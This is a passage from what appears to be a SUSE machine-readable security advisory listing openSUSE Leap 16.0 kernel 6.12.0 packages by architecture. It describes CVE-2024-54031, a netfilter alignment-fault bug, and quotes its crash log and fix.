"product_id": "openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-optional-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-default-optional-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-optional-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-optional-6.12.0-160000.26.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-optional-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-optional-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-optional-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-vdso-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-6.12.0-160000.26.1.noarch as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-devel-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-docs-6.12.0-160000.26.1.noarch as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-docs-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-docs-html-6.12.0-160000.26.1.noarch as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-docs-html-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-macros-6.12.0-160000.26.1.noarch as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-macros-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-build-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-obs-build-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-build-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-build-6.12.0-160000.26.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-obs-build-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-build-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-obs-build-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-obs-qa-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-rt-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-rt-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-extra-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-extra-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-optional-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-optional-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-vdso-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-6.12.0-160000.26.1.noarch as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-source-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-vanilla-6.12.0-160000.26.1.noarch as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-syms-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-syms-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.12.0-160000.26.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-syms-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-syms-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-6.12.0-160000.26.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kselftests-kmp-azure-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kselftests-kmp-azure-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kselftests-kmp-default-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kselftests-kmp-default-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kselftests-kmp-default-6.12.0-160000.26.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x"
},
"product_reference": "kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kselftests-kmp-default-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kselftests-kmp-rt-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kselftests-kmp-rt-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64"
},
"product_reference": "ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64"
},
"product_reference": "ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64"
},
"product_reference": "ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-default-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64"
},
"product_reference": "ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-default-6.12.0-160000.26.1.s390x as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x"
},
"product_reference": "ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-default-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64"
},
"product_reference": "ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
},
"product_reference": "ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-54031",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-54031"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_hash: unaligned atomic read on struct nft_set_ext\n\nAccess to genmask field in struct nft_set_ext results in unaligned\natomic read:\n\n[ 72.130109] Unable to handle kernel paging request at virtual address ffff0000c2bb708c\n[ 72.131036] Mem abort info:\n[ 72.131213] ESR = 0x0000000096000021\n[ 72.131446] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 72.132209] SET = 0, FnV = 0\n[ 72.133216] EA = 0, S1PTW = 0\n[ 72.134080] FSC = 0x21: alignment fault\n[ 72.135593] Data abort info:\n[ 72.137194] ISV = 0, ISS = 0x00000021, ISS2 = 0x00000000\n[ 72.142351] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 72.145989] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 72.150115] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000237d27000\n[ 72.154893] [ffff0000c2bb708c] pgd=0000000000000000, p4d=180000023ffff403, pud=180000023f84b403, pmd=180000023f835403,\n+pte=0068000102bb7707\n[ 72.163021] Internal error: Oops: 0000000096000021 [#1] SMP\n[...]\n[ 72.170041] CPU: 7 UID: 0 PID: 54 Comm: kworker/7:0 Tainted: G E 6.13.0-rc3+ #2\n[ 72.170509] Tainted: [E]=UNSIGNED_MODULE\n[ 72.170720] Hardware name: QEMU QEMU Virtual Machine, BIOS edk2-stable202302-for-qemu 03/01/2023\n[ 72.171192] Workqueue: events_power_efficient nft_rhash_gc [nf_tables]\n[ 72.171552] pstate: 21400005 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n[ 72.171915] pc : nft_rhash_gc+0x200/0x2d8 [nf_tables]\n[ 72.172166] lr : nft_rhash_gc+0x128/0x2d8 [nf_tables]\n[ 72.172546] sp : ffff800081f2bce0\n[ 72.172724] x29: ffff800081f2bd40 x28: ffff0000c2bb708c x27: 0000000000000038\n[ 72.173078] x26: ffff0000c6780ef0 x25: ffff0000c643df00 x24: ffff0000c6778f78\n[ 72.173431] x23: 000000000000001a x22: ffff0000c4b1f000 x21: ffff0000c6780f78\n[ 72.173782] x20: ffff0000c2bb70dc x19: ffff0000c2bb7080 x18: 0000000000000000\n[ 72.174135] x17: ffff0000c0a4e1c0 x16: 0000000000003000 x15: 0000ac26d173b978\n[ 72.174485] x14: ffffffffffffffff x13: 0000000000000030 x12: ffff0000c6780ef0\n[ 72.174841] x11: 0000000000000000 x10: ffff800081f2bcf8 x9 : ffff0000c3000000\n[ 72.175193] x8 : 00000000000004be x7 : 0000000000000000 x6 : 0000000000000000\n[ 72.175544] x5 : 0000000000000040 x4 : ffff0000c3000010 x3 : 0000000000000000\n[ 72.175871] x2 : 0000000000003a98 x1 : ffff0000c2bb708c x0 : 0000000000000004\n[ 72.176207] Call trace:\n[ 72.176316] nft_rhash_gc+0x200/0x2d8 [nf_tables] (P)\n[ 72.176653] process_one_work+0x178/0x3d0\n[ 72.176831] worker_thread+0x200/0x3f0\n[ 72.176995] kthread+0xe8/0xf8\n[ 72.177130] ret_from_fork+0x10/0x20\n[ 72.177289] Code: 54fff984 d503201f d2800080 91003261 (f820303f)\n[ 72.177557] ---[ end trace 0000000000000000 ]---\n\nAlign struct nft_set_ext to word size to address this and\ndocumentation it.\n\npahole reports that this increases the size of elements for rhash and\npipapo in 8 bytes on x86_64.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
